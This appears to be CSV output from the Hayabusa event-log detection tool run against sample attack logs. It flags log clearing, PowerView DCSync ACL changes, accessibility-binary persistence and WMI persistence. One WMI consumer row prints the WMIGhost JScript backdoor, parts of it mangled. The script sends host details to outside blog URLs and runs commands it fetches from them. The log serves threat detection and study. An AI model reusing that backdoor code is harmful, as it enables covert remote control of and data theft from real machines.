365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | 
PGUID: 365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 
365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 
365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 
365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process 
Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 
365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx 2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx 2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 
365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new 
Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI 
Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 
4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 
